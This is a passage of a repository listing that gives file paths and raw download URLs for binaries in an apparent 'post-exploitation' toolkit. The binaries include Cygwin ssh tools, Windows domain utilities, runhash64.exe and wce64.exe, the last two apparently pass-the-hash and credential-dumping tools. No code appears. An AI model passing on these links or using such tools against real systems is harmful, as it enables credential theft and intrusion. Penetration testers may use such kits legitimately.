https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygminires.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygssp-0.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygssp-0.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygwin1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygwin1.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygz.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygz.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/scp.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/scp.exe
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/ssh-agent.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/ssh-agent.exe
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/ssh-keygen.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/ssh-keygen.exe
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/ssh.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/ssh.exe
--------------------------------------------------------------------------------
/win64bins/bitsadmin64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/bitsadmin64.exe
--------------------------------------------------------------------------------
/win64bins/dsacls.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/dsacls.exe
--------------------------------------------------------------------------------
/win64bins/en-US/dsacls.exe.mui:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/en-US/dsacls.exe.mui
--------------------------------------------------------------------------------
/win64bins/nltest64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/nltest64.exe
--------------------------------------------------------------------------------
/win64bins/runhash64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/runhash64.exe
--------------------------------------------------------------------------------
/win64bins/showmount.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/showmount.exe
--------------------------------------------------------------------------------
/win64bins/wce64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/wce64.exe
--------------------------------------------------------------------------------